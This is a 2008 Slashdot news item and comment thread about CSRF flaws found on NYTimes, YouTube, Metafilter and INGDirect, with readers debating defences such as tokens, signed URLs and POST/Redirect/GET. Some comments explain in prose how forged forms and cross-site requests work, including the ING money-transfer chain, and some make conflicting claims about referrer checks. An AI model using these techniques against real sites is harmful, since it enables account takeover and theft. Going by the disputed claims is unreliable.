
CSRF Flaws Found On Major Websites, Including a Bank

An anonymous reader sends a link to DarkReading on the recent announcement by Princeton researchers of four major Web sites on which they found exploitable cross-site request forgery vulnerabilities. The sites are the NYTimes, YouTube, Metafilter, and INGDirect. All but the NYTimes site have patched the hole. "... four major Websites susceptible to the silent-but-deadly cross-site request forgery attack — including one on INGDirect.com's site that would let an attacker transfer money out of a victim's bank account ... Bill Zeller, a PhD candidate at Princeton, says the CSRF bug that he and fellow researcher Edward Felten found on INGDirect.com represents ... 'the first example of a CSRF attack that allows money to be transferred out of a bank account that [we're] aware of.' ... CSRF is little understood in the Web development community, and it is therefore a very common vulnerability on Websites. 'It's basically wherever you look,' says [a security researcher]." Here are Zeller's Freedom to Tinker post and the research paper (PDF).
  • by suck_burners_rice ( 1258684 ) on Monday September 29, 2008 @10:06PM (#25200635)
    Just as a responsible institution has an independent auditor come to inspect their financial books for correctness, so should a responsible institution do with its computer systems and network security. The two are different only insofar as financial accounting is different from computer administration, but the need to audit both is equally pressing. This story serves as yet another example of the necessity for such things.
    • by Darkness404 ( 1287218 ) on Monday September 29, 2008 @10:08PM (#25200663)
      The problem isn't really that flaws were found, but that the NYTimes refused to fix them. If you look in 2600, you will see that even when hackers have posted step-by-step guides to 0wning s3rv3rs, the businesses just claim that it is supposed to be like that, or never get around to fixing them.
    • by zobier ( 585066 ) <<ten.reiboz> <ta> <reiboz>> on Monday September 29, 2008 @10:45PM (#25200891)

      Repeat after me boys and girls "GET requests shouldn't change anything on the server".

      • Re: (Score:3, Insightful)

        by MrNaz ( 730548 )

        There are ways to make GET requests safe. Unnecessarily avoiding the use of GET results in web sites that are not bookmarkable and where users can't provide links to their friends. So "hey, check this out" plus a pasted link becomes "hey, check this out: go to the main page, click here, then there, then on the other thing, then scroll down a bit to find the item in the list, and then it's halfway down that page".

        • by zobier ( 585066 ) <<ten.reiboz> <ta> <reiboz>> on Tuesday September 30, 2008 @12:00AM (#25201275)

          I didn't say anything about not having GET, I was talking about safe GET requests. Obviously it's OK to have a link to your user profile/picture gallery/&c. What is a bad idea is a link that will add someone as a friend or delete a picture, you get the idea.

      • by TheLink ( 130905 ) on Monday September 29, 2008 @11:28PM (#25201115) Journal
        GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

        What they should do is sign urls (at least for significant stuff), so you can't just iframe a static url, you have to guess the correct url - which should change at least on a per session basis.

        e.g. instead of http://slashdot.org/my/logout it should be something like http://slashdot.org/my/logout?salt=123955813&sig=01af85b572e956347a56

        Where sig=sha1(concat(user session,salt,site secret,site time in hours))

        If sig doesn't match, you try to see if sig matches the time that rolled over:
        sig=sha1(concat(session,salt,site secret,site time in hours-1))

        user session = random string+primary key.

        For stuff that should not be resubmitted, you use another param to enforce that.
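The signing scheme sketched above can be written out roughly as follows. This is a minimal illustration in Python, not the poster's actual code; the helper names, the `SITE_SECRET` constant, and the query-string format are all assumptions, and a production version would use HMAC with a stronger hash rather than a plain SHA-1 of concatenated strings.

```python
import hashlib
import hmac
import secrets
import time

SITE_SECRET = "example-site-secret"  # assumption: a secret known only to the server

def sign_url(path, session_id):
    """Build a signed URL: sig = sha1(session + salt + secret + hour), per the scheme above."""
    now_hours = int(time.time() // 3600)
    salt = secrets.randbelow(10**9)
    msg = f"{session_id}{salt}{SITE_SECRET}{now_hours}".encode()
    sig = hashlib.sha1(msg).hexdigest()
    return f"{path}?salt={salt}&sig={sig}"

def verify_url(session_id, salt, sig):
    """Accept the current hour's signature, or the previous hour's if time just rolled over."""
    now_hours = int(time.time() // 3600)
    for hour in (now_hours, now_hours - 1):
        expected = hashlib.sha1(f"{session_id}{salt}{SITE_SECRET}{hour}".encode()).hexdigest()
        if hmac.compare_digest(expected, sig):  # constant-time comparison
            return True
    return False
```

Because the signature depends on the victim's session, an attacker who can only guess a static URL (e.g. for an iframe) cannot produce a valid `sig`.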
        • by spec8472 ( 241410 ) on Tuesday September 30, 2008 @12:18AM (#25201379) Homepage

          While GET does in practice change stuff on the server, the idea is that it should be repeatable without adverse effect.

          So, calling GET on a document might increase a hit counter, or update some other information - having me repeatedly call that function again should be safe.

          However using GET for Updating Account Details, or Moving money (just some purely /random/ examples) is just plain bad design.

          The example of signing GET requests is useful in some situations, but *mostly* not necessary if the design is right.

        • by darkfire5252 ( 760516 ) on Tuesday September 30, 2008 @12:19AM (#25201383)

          GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

          ... CSRF exploits are not the reason that GET requests shouldn't change anything on the server. Implement all of your secret one time link programs, but you'll be disappointed when someone using an 'internet accelerator' that pre-fetches pages comes by and illustrates the reason that GET ought to be separate from POST...

          • by evanbd ( 210358 ) on Tuesday September 30, 2008 @02:01AM (#25201875)
            The spec is a little odd in this regard. It says that GETs should be idempotent -- repeating the request shouldn't change anything. That is not the same as saying that performing the request the first time shouldn't change anything. For example, clicking a "remove this from my shopping cart" link twice would have the same result as only doing it once -- the item is gone. But the request is still idempotent. That doesn't mean that you should do that, but it does conform to spec.
            • Re: (Score:3, Informative)

              by Bogtha ( 906264 )

              The spec is a little odd in this regard. It says that GETs should be idempotent -- repeating the request shouldn't change anything. That is not the same as saying that performing the request the first time shouldn't change anything.

              Have you actually read the spec [ietf.org]? Yes, it says that GET requests should be idempotent. It also says that GET requests should be safe. These are two different things. Saying that it requires GET requests to be idempotent, but this doesn't mean that they should be safe is te

          • Re: (Score:3, Interesting)

            by TheLink ( 130905 )

            Well then that sort of internet accelerator will break on slashdot, gmail etc, since the last I checked, with all of them, you can get logged out with a simple GET request.

            Clicking the following will result in a GET request that logs you out from slashdot:

            http://slashdot.org/my/logout [slashdot.org]

        • by tuma ( 1313099 ) on Tuesday September 30, 2008 @01:16AM (#25201701)

          GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

          I agree that the "click OK to resubmit form" messages are annoying - and dangerous, because your average user has no idea what the message means, or what the implications might be of clicking OK.

          Fortunately, there is an extremely simple paradigm that works beautifully:

          1. When an HTTP request is going to change something on the server, make it a POST request.
          2. The server receives the POST request, and updates internal state, etc. When it is finished handling the internal changes (either successfully or not), it does NOT print an HTML page. Instead, it prints a REDIRECT message telling the web browser the next page it should GET. (You're the author of the web app, so you can build whatever ultra-specific URL you want here.)
          3. The web browser GETs the specified page and displays it, showing whatever HTML you deem to be appropriate as the result of the POSTed change.

          At the conclusion of this interchange, the user's browsing history only contains the GET page that was displayed before the POST, followed by the GET page showing the results. They can freely use their forward and back buttons to navigate within their history with no ill effect, and they will never see a "resubmit form?" question from their browser.

          I use this paradigm 100% of the time. You receive tremendous benefits by respecting the documented/intended behavior of GET/POST (e.g. no problems with caching or prefetch, and when a user intentionally resubmits a POST operation it will truly be resubmitted to the server), without the painful "resubmit form?" redux.
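The POST/Redirect/GET flow described above can be sketched framework-free. This is an illustrative Python fragment, not anyone's production code; the handler names, the in-memory `ACCOUNTS` dict, and the result URL are all invented for the example.

```python
# Minimal sketch of POST -> Redirect -> GET (all names are hypothetical)
ACCOUNTS = {"alice": 100}

def handle_post(user, amount):
    """Apply the state change, then answer with a redirect instead of an HTML page."""
    ok = ACCOUNTS.get(user, 0) >= amount
    if ok:
        ACCOUNTS[user] -= amount
    # Tell the browser which page to GET next; reloading that page
    # re-runs only the harmless GET, never the POST.
    return ("303 See Other", {"Location": f"/result?user={user}&ok={int(ok)}"})

def handle_get_result(user, ok):
    """Render the result page; safe to refresh or revisit from history."""
    return ("200 OK", f"Transfer {'succeeded' if ok else 'failed'} for {user}")
```

The key design point is that the POST handler's response carries no displayable content, so the browser's history contains only GET pages.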

          • by TheLink ( 130905 )
            Yep, been doing that too.

            Note: this is mandatory for login forms.

            It's amazing some sites don't do it...

            So someone logs out, forgets to close browser, naughty person comes along goes back in browser history and resubmits the logon credentials!

            Hilarious.

            There's no need to do fancy/hardcore hacking when there's plenty of low hanging fruit like that.
          • by wrook ( 134116 )

            Thank you for that description. I'm not a web developer, but I occasionally build web applications for my own personal use. This is really helpful!

          • This is pretty much the standard paradigm in ruby on rails as well, as far as I can tell. Does work nicely.

          • When it is finished handling the internal changes (either successfully or not), it does NOT print an HTML page. Instead, it prints a REDIRECT message telling the web browser the next page it should GET.

            AMEN, brother! This is what I always do in my web applications - the trick is storing the result of the operation in a session variable. But after you've done that, you can forget about those "resubmit?" annoyances.

          • by dave420 ( 699308 )
            It's the Location: header, and it works exactly that way. I don't know why sites don't use it more often - it completely makes POSTing a non-issue for everyone concerned.
      • GET requests shouldn't change anything on the server

        That's not entirely accurate. GET requests should be idempotent, meaning that one request has the same effect as N identical requests. That actually has nothing to do with the server's own state, which may be caching internally or is otherwise able to handle resubmission gracefully.

        In any case, GET vs POST isn't a security concern—both are equally susceptible to exploits.

      • Repeat after me boys and girls "GET requests shouldn't change anything on the server".

        You can perform CSRF with POST just as easily as with GET.

      • by Monkier ( 607445 )

        If you want to point someone at something more authoritative:

        * Use GET if:
          o The interaction is more like a question (i.e., it is a safe operation such as a query, read operation, or lookup).
        * Use POST if:
          o The interaction is more like an order, or

      • by Monkier ( 607445 )

        reminds me of a story: i worked somewhere where the 'send out mailing list emails' job was a script you hit in your browser, something like: http://website.com/domailinglist [website.com] to send out all the emails..

        turns out every night the webstats package would go through the server logs and GET every page to find the title tag.. d'oh

      • by ebeeson ( 716839 )
        Repeat after me: "telling people 'GET shouldn't change anything' reinforces the dangerously incorrect notion that POST can't be forged".

        JavaScript makes it *trivial* to POST data to an arbitrary server. Seriously, the only way to properly deal with this is to include and verify some sort of token in all POST requests (along with not allowing GET requests to modify data).
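The token scheme this comment calls for can be sketched in a few lines. This is an illustrative Python fragment under assumed names (`session` is stood in for by a plain dict); real frameworks ship their own equivalents of these two helpers.

```python
import hmac
import secrets

def issue_csrf_token(session):
    """Mint an unguessable token and stash it in the server-side session."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token  # embed as <input type="hidden" name="csrf_token" value="...">

def verify_csrf_token(session, submitted):
    """Reject the POST unless the submitted token matches the session's (constant-time)."""
    expected = session.get("csrf_token")
    return bool(expected) and hmac.compare_digest(expected, submitted)
```

A forged cross-site POST fails because the attacker's page cannot read the victim's session (or the hidden field on the legitimate form) to learn the token.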
      • by dougmc ( 70836 )
        No, I won't. It's not that simple.

        Sure, that's a nice rule of thumb, one you'll probably not go wrong following, but it's not a rule in general.

      • by brunes69 ( 86786 ) <[gro.daetsriek] [ta] [todhsals]> on Tuesday September 30, 2008 @09:22AM (#25203697) Homepage

        Changing GET to POST does not, in any way shape or form, protect you from a CSRF attack.

        If you think it does and have been doing this on your own site or projects, you have some more research and work to do.

        All changing GET to POST does is make it a tiny bit harder for Joe n00b hacker. But anyone with half a clue knows how to use JS to do CSRF using POST requests.

      • by jc42 ( 318812 )

        Repeat after me boys and girls "GET requests shouldn't change anything on the server".

        Nonsense. Every GET request changes something on the server. It adds a line to the server log. So you're banning all GET requests.

        Actually, I think I know what you meant to say. But the above statement is so over-simplified and dumbed down that it's just wrong. If my boss were to seriously attempt to enforce such a dumb rule, I'd be updating my resume really fast.

        Unfortunately, the correct guideline needs to be a bit

        • by zobier ( 585066 )

          You're right but you also sound like you know what you're doing.
          It's both sad and dangerous how many web developers haven't the faintest clue WTF is going on.

    • by Corbets ( 169101 )

      Actually, you'll find that many auditing firms (such as Deloitte or PwC) offer both services. They go hand in hand, because the audit mindset is at some level the same.

      The trick we face, of course, is convincing IT-types of how important it is, whereas accountants either already understand the need, or accept that the law requires it (NOT that I'm proposing making this a legislative requirement!).

  • Why is it that... (Score:5, Interesting)

    by Darkness404 ( 1287218 ) on Monday September 29, 2008 @10:06PM (#25200641)
    Why is it that some business even when notified of a major security risk either say that it is functioning normally or not patch the thing right away? Do some businesses not have sysadmins or what? If I got an E-mail that said that my servers could be owned by such and such exploit by doing this and this, I would immediately take action.
    • Re: (Score:3, Insightful)

      by Ostracus ( 1354233 )

      "If I got an E-mail that said that my servers could be owned by such and such exploit by doing this and this, I would immediately take action."

      Except another recent E-mail says that your job just has been outsourced and you have five minutes to clean out your desk. Happy fixing.

    • Hanlon's Razor (Score:5, Insightful)

      by A non-mouse Coward ( 1103675 ) on Monday September 29, 2008 @10:38PM (#25200855)
      I think Hanlon's Razor [wikipedia.org] is in play here.

      Never attribute to malice that which can be adequately explained by stupidity.

      Don't assume these people don't care or don't want to fix it. CSRF is in the class of "WebAppSec" (what the kids call it these days) that is not "syntactic" in nature; meaning that you cannot just say "here, use this API and you're safe". It's a "semantic" problem; the developer has to both understand "how" sensitive transactions can be abused AND "how" these transactions can be fixed (like with a nonce [wikipedia.org]).
      It's probably just that they don't know how to do it, at least not manageably on an average budget.
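A nonce-based fix like the one linked above can be sketched as a one-time-use token: issued when the sensitive form is rendered, consumed when it is submitted. This Python fragment is purely illustrative; a real implementation would scope nonces per user/session and expire them, rather than use a global set.

```python
import secrets

ISSUED_NONCES = set()  # assumption: stands in for per-user server-side storage

def issue_nonce():
    """Mint a fresh nonce for one rendering of a sensitive form."""
    nonce = secrets.token_hex(16)
    ISSUED_NONCES.add(nonce)
    return nonce

def consume_nonce(nonce):
    """A nonce is valid exactly once; replays and forged submissions both fail."""
    try:
        ISSUED_NONCES.remove(nonce)
        return True
    except KeyError:
        return False
```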

    • Re:Why is it that... (Score:5, Interesting)

      by Chundra ( 189402 ) on Monday September 29, 2008 @11:05PM (#25200995)

      Because many (most?) large organizations have so many layers of bureaucratic red tape to cross that it's extremely difficult to ever get anything done quickly. Here's an example of what was involved in installing a vendor's security patch in a company I used to work for.

      We'd have to test the changes in a sandbox environment and engage all stakeholders of all systems that even remotely touched the app. They would have to buy off on the change entering the development environment. Time spent here: 1-5 days depending on approvals.

      We'd schedule a move to dev and immediately work with the help desk (to update their documentation--needed or not), and work with packaging teams to "productize" the change (which mind you, was often a simple configuration change or an installer from a vendor). We'd test the new rerolled installer and if it looked ok request buyoff from all stakeholders after they performed their tests. We'd request to move to the integration testing environment if all looked good. Time spent here: 2-6 weeks depending on approvals and packaging issues.

      In the integration testing environment disgruntled test lab system administrators got involved. They'd work with the deployment teams to install the packages, but only during certain scheduled times that both the admins and the software deployment groups agreed to. Again we'd need buy off from all stakeholders after they did full regression tests to get past this gate. Any problems meant you went back to Dev. Time spent here: 2-4 weeks depending on approvals and scheduling.

      Leaving integration testing you reach the user acceptance environment. Here the same disgruntled system administrators would be involved and the process was pretty much the same as in the integration testing environment. Except now instead of just stakeholder buy off you'd need to get buy off from the performance testing teams. If they gave a thumbs up, you'd have to work on scheduling focus groups with small subsets of real end users. Time spent here: 2-6 weeks depending on approvals.

      Now, if the planets were correctly aligned and you said all your prayers, you would then have the opportunity to schedule a move to production. This usually results in at least a 1 week delay. In production, the people who know how things work are not allowed to touch anything due to various regulatory requirements and separation of duties. So in production, you deal with a different set of disgruntled systems administrators and a variety of production control operators. These are completely different guys than the ones in the test lab. They are incapable of doing anything except for exactly what you specify in an "engineering packet" which details in obscene detail exactly what needs to be done. Think of the level of detail you'd have to provide to a 10 year old with ADHD. Before working with them you'd go to the "change review board" which meets once a week, and if you were lucky and got all your forms filled out correctly you'd get a time slot to have those admins and operators push your change out. They often times screwed something up so you'd be delayed at least another week. Time spent getting into production: 1-5 weeks.

      It was truly fucked, but seems to be the norm across all the larger organizations I've ever worked in.

      • by guruevi ( 827432 )

        You were lucky, I was in a company once where change had to be approved in a similar process. Except the departmental meetings to bring up the change issue was once a week, the inter-departmental meetings to bring up changes across stakeholders in different departments was maybe once a month (if you were lucky). Once you got the whole project together and sat through many inter-departmental meetings listening to petty catfights in HR or finance and got everybody to sign off on the approval, you had to go in

  • The CEO had already taken all the money in your account. There is nothing left in your account, so the hacker couldn't do any more damage. This is the new security measure that thwarts the hackers. Now the CEO wants another $700 billion for this brilliant outflanking of the hackers.
  • Recent stock market crash and bank sales are actually a ploy by some clever Russian hackers...
  • Very nasty (Score:5, Informative)

    by Twigmon ( 1095941 ) on Monday September 29, 2008 @10:27PM (#25200785) Homepage

    This looks like a very nasty attack to defend against. More info:

    http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]

    • Re: (Score:2, Informative)

      by SRowley ( 907434 )
      The linked paper shows that a few very simple things can defend against this attack altogether:
      • Don't allow GET requests to modify anything
      • Send a pseudorandom token with every form

      It's just not a very well known attack.

      • Re: (Score:3, Informative)

        by Curien ( 267780 )

        Don't allow GET requests to modify anything

        That doesn't protect you. Sure, it prevents the img tag vector, but it doesn't stop an attacker from convincing users to submit an arbitrary form.

        Send a pseudorandom token with every form

        As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

        • by this great guy ( 922511 ) on Monday September 29, 2008 @11:40PM (#25201151)

          [A pseudorandom token] doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          Saying that is like saying "cryptography doesn't really provide privacy, because it is subject to brute force". Of course pseudorandom tokens stop CSRF attack (when implemented properly).

        • how exactly would the attacker use a brute force attack on a CSRF vulnerability? i don't think a user can be convinced to resubmit a form more than 2-3 times, much less the hundreds of thousands of times necessary to crack any moderately secure session token.

          and all you need to do is block outside referrers. that's the oldest trick in the book. it's simple to implement and effectively protects against most CSRF attacks.

          • by Curien ( 267780 )

            First off, you don't need to have the user actually click submit. You can submit forms with Javascript or even just use XMLHTTPRequest.
            Secondly, checking referrers is pointless. It's easy to lie about them.

        • by Sancho ( 17056 ) *

          As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          The token should have a very short lifetime. If the attacker can brute-force the token before it expires, yes, they'll win, but correctly-implemented, that should not happen.

        • Send a pseudorandom token with every form

          As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          The nature of CSRF is that one of your legit users has to be a party to the attack (of which the are ultimately the victim), though. Is one of my users going to click a CSRF-exploit link 4 billion times in a row, where each attempt displays a page t

    • Very easy (Score:4, Informative)

      by SanityInAnarchy ( 655584 ) <ninja@slaphack.com> on Monday September 29, 2008 @10:45PM (#25200893) Journal

      Ruby On Rails has prevented this, by default, for almost a year:

      http://api.rubyonrails.org/classes/ActionController/RequestForgeryProtection/ClassMethods.html [rubyonrails.org]

      That not only protects against the image hack, it also protects against things like a hidden form in an iframe.

      Granted, it's still possible for you to do stupid things with GET requests, and it's possible you could turn it off entirely. But it's pretty trivial to stay safe here.

      And no, there's not really going to be a sane way for browsers to protect you from this, unless you've left on all the annoying "You are about to send data over the internet!!!1!one" warnings. This is really going to be up to site admins to fix.

      • Re: (Score:2, Insightful)

        by Twigmon ( 1095941 )

        That unfortunately doesn't defend against GET requests. This means that if your script allows anything vulnerable to be requested via GET, then the 'image' attack vector is not protected. This includes when GET requests are supposed to be made via XMLHttpRequest.

        It does defend against a form in a hidden iframe, however, you have to actually *use* it for your application to be protected.

        Regarding browsers fixing the problem, you are correct. It's very very unlikely that the developers of browsers will imple

        • That unfortunately doesn't defend against GET requests. This means that if your script allows anything vulnerable to be requested via GET, then the 'image' attack vector is not protected.

          Correct. That's why I mentioned "stupid things with GET requests", and why the page I linked to also links to some documentation about idempotence.

          Building an app on top of this, I don't think I've ever written a GET request that modifies anything it shouldn't.

          It does defend against a form in a hidden iframe, however, you have to actually *use* it for your application to be protected.

          True, but it is enabled by default in the new skeleton ApplicationController, and the whole secret key thing is negated by the new default cookie-based session store.

          So, you have to pay attention when porting an old app, but you should be paying atten

      • by nacturation ( 646836 ) * <nacturation@gmAUDENail.com minus poet> on Monday September 29, 2008 @11:49PM (#25201199) Journal

        Ruby On Rails has prevented this, by default, for almost a year...

        Nice boast, but I'll see your Ruby on Rails for almost a year and raise you a .NET viewstate for five and a half years [microsoft.com]. Go Microsoft!

        • Re: (Score:3, Informative)

          My boast wasn't about Ruby, it was pointing out the triviality of the problem.

          If Microsoft has actually done this, and done it right, for five and a half years, great! It means even less of an excuse for anyone to get it wrong.

    • can someone please explain to me why the wikipedia page on the confused deputy problem [wikipedia.org] (the class of attacks to which CSRF belongs to) contains a picture of Don Knotts?

      i really don't see what Barney Fife has to do with privilege escalation or computer security.

  • Details and Examples (Score:5, Informative)

    by nmb3000 ( 741169 ) <nmb3000@that-google-mail-site.com> on Monday September 29, 2008 @10:28PM (#25200787) Journal

    For anyone curious, Jeff Atwood of Coding Horror recently wrote about them [codinghorror.com] in his blog. Included are some additional details and a couple of examples.

    At face value it's a somewhat obvious exploit, but still interesting.

    • by sam0737 ( 648914 )

      I think using nonce in the form is also a very effective way to prevent CSRF?

      Nonce means "number used once". Basically it is just a number generated by the server, known to the server and the client. Think of it like a CAPTCHA whose current value other sites can't guess, except the answer is known to the browser automatically.

      It isn't mentioned in the FAQ in the parent.

      Web application developers should really learn from existing webapps, like blogs such as Wordpress or any other popular forum software; they are usually a

  • Heh (Score:5, Funny)

    by FlyByPC ( 841016 ) on Monday September 29, 2008 @10:32PM (#25200811) Homepage
    "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

    I knew something smelled funny...
    • "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

      I knew something smelled funny...

      That would be methane.

    • by KGIII ( 973947 ) *

      Was it you that tagged this "silentbutdeadly fart" then? ;) (I think you have to use the beta front page view to see that tag though.)

    • "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

      I knew something smelled funny...

      GASP! It's the methane! We're all gonna die!

  • Since the CSRF request will come with the referrer header set to the attacker's site, validating the referrer should also counter this attack.

    This is not the same as the "same origin policy" in Appendix B of the paper.
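A referrer check like the one proposed here is only a few lines. This Python sketch is illustrative (the hostname and strictness policy are assumptions); as the replies note, the header is optional and often stripped by privacy proxies, so this can only be defense-in-depth, not a complete fix.

```python
from urllib.parse import urlparse

def referer_looks_ok(headers, own_host="bank.example.com"):
    """Reject state-changing requests whose Referer names a foreign host.
    Strict policy: a missing Referer is also rejected, which is known to
    break for users behind header-stripping proxies."""
    ref = headers.get("Referer", "")
    if not ref:
        return False
    return urlparse(ref).hostname == own_host
```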

    • Re: (Score:1, Informative)

      by Anonymous Coward

      The referer field is optional and unreliable. It should never be used for security.

      • by argent ( 18001 )

        Optional, perhaps, but in practice I've used it to discourage address scrapers for over 10 years and don't recall a single complaint from anyone about requiring a referrer. In practice it's almost always present.

        And unreliable? How would it fail in a way that delivered the correct URL for a referrer check over an HTTPS connection? It won't even be seen by a proxy, let alone modified or removed.

        The worst case is a false positive, and only if the end user has explicitly chosen to disable it.

        • I've used it to discourage address scrapers

          This is the kind of tactic that I just don't get. Unlike random session tokens, referrer-checking is an arms race that the other side can trivially win. The scraper writer just has to spend 2 minutes adding a pass-referrers feature to his program, and then for the next 10 years you get perfectly normal-looking requests. Sure, it might work a little and turn away some really old scrapers, but in the end you're going to get scraped anyway. So why bother?

          • by argent ( 18001 )

            Unlike random session tokens, referrer-checking is an arms race that the other side can trivially win. The scraper writer just has to spend 2 minutes adding a pass-referrers feature to his program

            Because it's virtually free to do and it DOES block some attempts. While it's possible some of them are scrupulous there's a LOT of traces in my logs from spidering software that is unimaginably sloppy. Basically, lots of them simply don't bother.. possibly because enough people figure that it's trivially defeated

      • your comment suggests that you don't understand what a CSRF attack is.

        http referer can be intentionally spoofed by an untrusted browser, but a CSRF attack is executed by an untrusted page on a trusted browser. in this case the server is not the target, the user is. the attacker's page can cause the victim's browser to make a forged GET or POST request without the user's knowledge, but the request headers are still set by the browser, and thus cannot be altered by the attacker.

        if you were using http referer

        • by pavon ( 30274 )

          The referrer can be spoofed using javascript [cgisecurity.com] (XMLHttpRequest), and thus cannot be depended on even with trusted browsers.

          • Re: (Score:3, Informative)

            hrmm... i was not aware of this. i thought XMLHttpRequest could not be executed across domains. this seems like a pretty serious security design flaw.

            i mean, shouldn't the same origin security policy [mozilla.org] prevent XMLHttpRequest from making requests across domains? i remember when i wrote AJAX applications in the past that i couldn't even call XMLHttpRequest on a subdomain.

    • Last year I went around adding CSRF protection to my employer's site, and I had my check-the-session-token function go ahead and look at the referrer too, just as an "extra" check. If either the token or the referrer was wrong, reject the request.

      I ended up having to remove the referrer check, because too many people were passing blank referrers. It's well-known that there are browsers and proxies out there which remove that header, in the name of privacy or whatever. What I didn't know, though, is that a lot of nontechnical users are unknowingly using these privacy-protecting tools.

      • by argent ( 18001 )

        What I didn't know, though, is that a lot of nontechnical users are unknowingly using these privacy-protecting tools. Maybe they're being deployed as transparent proxies at large orgs or something

        A lot of proxies drop referrers and user agents, yeh. There's proxies specifically for that.

        But they can only do that for plain HTTP connections. They can't look inside HTTPS.
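The workaround the poster above landed on, before dropping the check entirely, is usually implemented as a *lenient* referer check: since many proxies and privacy tools strip the header, an absent referer is allowed, and only a referer that is present but points at a different host is rejected. A sketch (the trusted host name is made up):

```python
from urllib.parse import urlparse

TRUSTED_HOST = "example.com"  # hypothetical site host

def referer_ok(referer_header):
    """Lenient referer check for state-changing requests.

    A blank/missing referer proves nothing (it may have been stripped
    by a proxy or browser), so it is allowed.  A referer naming a
    different host indicates a cross-site request and is rejected.
    """
    if not referer_header:
        return True
    return urlparse(referer_header).hostname == TRUSTED_HOST

assert referer_ok(None)                                   # header stripped
assert referer_ok("https://example.com/transfer")         # same site
assert not referer_ok("https://evil.example.net/attack")  # cross-site
```

The trade-off, of course, is that a CSRF request arriving through a referer-stripping proxy also passes, which is why this is only a complement to a token check, not a replacement.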

  • by z0idberg ( 888892 ) on Monday September 29, 2008 @10:46PM (#25200901)

    including one on INGDirect.com's site that would let an attacker transfer money out of a victim's bank account

    With my INGdirect account (in Australia) you can only transfer your savings back into the normal bank account that is associated with the ING account. So I don't think an attacker could actually transfer money out to somewhere they could get at it. Associating another bank account with the ING account requires more than just logging in to your ING account (phone/written permission etc., IIRC).

    The attacker would be able to cause some inconvenience and will get your bank account number etc. but I can't see how they would actually get your money.

    • The attacker would be able to cause some inconvenience and will get your bank account number etc. but I can't see how they would actually get your money.

      It shouldn't be that big of a risk, since those are the same numbers that are on a check.

      • The full numbers of the accounts are never displayed after you create an account. All they would get would be the last four digits.
        • For a check or ING Direct?

          Answer:
          You are wrong.

          On both, the full account number is displayed, since that is what you need to use the account for an EFT or with a check.

          • I guess I was wrong about the ING account numbers, but I was mostly referring to the other account numbers. I just checked, and my other verified accounts I can transfer to do not show the full numbers, so I would not have to worry about my personal banking account number being discovered. I had to enter them when I set up the account, but they do not display that information after the initial setup. Obviously a check has the account number on it (as well as the routing number).
    • by Xelios ( 822510 )
      The situation is similar in Germany with just about all internet banking. No money can be transferred online without inputting a 6 digit number called a TAN code. Whenever you run out you request another list of TAN codes from the bank which get sent to you by registered mail. When you transfer money through a bank's website it'll ask you for a random TAN code number (like "Enter TAN number 93"), once a TAN code is used it can't be used again. Each time I log into my bank's website it shows me the last TAN
    • The PDF described the attack in detail. The attacker opens a new ING account in your (logged-in) identity, transfers any amount of your money from your personal linked account into "your" new ING account, adds any arbitrary payee (the attacker's own ING account, opened previously), then transfers funds from "your" new ING account to the attacker's ING account. They say it's been fixed, but please don't presume this wasn't a major issue.
  • Really? If your idea of "the web community" is people who rely on the code fragments at php.net to do their jobs, maybe.
  • Translation: The idiot who set up the site left holes for post values.

    Honestly it's not as complex as people describe it, at least if it's referring to what I think it's referring to.

    You can exploit this type of vulnerability by viewing the source of the target website, figuring out how it fits together, and writing up an HTML form of your own. I use the same trick to automatically log myself into a lot of secure web-based tools I use at work without having to input login info.
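The view-source-and-rebuild-the-form technique described above can be sketched as a page generator. All names here are made up for illustration: the attacker copies the form's action URL and input names from the target site, then serves a page like this from any other domain; a victim who is already logged in at the target loads it, and the browser submits the form with the victim's cookies attached:

```python
# Hypothetical target endpoint and field names, copied from the
# target page's source the way the poster describes.
TARGET = "https://bank.example/transfer"
FIELDS = {"to_account": "12345", "amount": "1000"}

def forged_form(action, fields):
    """Build an auto-submitting HTML form (the classic CSRF payload)."""
    inputs = "\n".join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in fields.items()
    )
    return (
        f'<form id="f" action="{action}" method="POST">\n{inputs}\n</form>\n'
        '<script>document.getElementById("f").submit()</script>'
    )

page = forged_form(TARGET, FIELDS)
assert 'action="https://bank.example/transfer"' in page
assert 'name="amount"' in page
```

Note the victim never sees a login prompt: the whole point of CSRF is that the victim's existing session does the authenticating.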

  • Big flippin deal (Score:4, Interesting)

    by Jeffrey Baker ( 6191 ) on Monday September 29, 2008 @11:07PM (#25201013)

    Any chump can transfer money out of any bank account with nothing but a fax. Try it some time. People don't do it because it's a felony and people generally don't want to go to prison.

    Also, there were several CSRF attacks that came across Bugtraq in 2000 and 2001. Some of them were against banks.

  • So... CSRF is largely misunderstood or ignored by the Web community? Wow! How could that be? The article says exactly NOTHING about what it actually is, or how it is accomplished!

    Is it possible that this refers to Cross-Site Scripting? In which case, LOTS of people know about it, and while some sites may be vulnerable, most professionals are aware.

    If this is NOT cross-site scripting, then how is it different? The article says nothing about that. Is this a real alarm (in which case we need to know what
    • Re: (Score:1, Informative)

      by Anonymous Coward

      There's a direct link to the research paper in the summary. There's also a link in the first paragraph of the article. It says plenty, you just need to look. :)

      Is it possible that this refers to Cross-Site Scripting?

      No, the article states categorically that this is not cross-site scripting.

      • I followed the links and I see how this works. (FYI, I don't think "categorically" was quite the word you wanted there; I think you meant "specifically.")

        In any case, even if I am wrong in that, thanks for pointing me in the right direction. I understand now that it is different.
    • Re: (Score:2, Informative)

      by moniker127 ( 1290002 )

      It's hard to tell, but my guess is that it's regular old POST values.

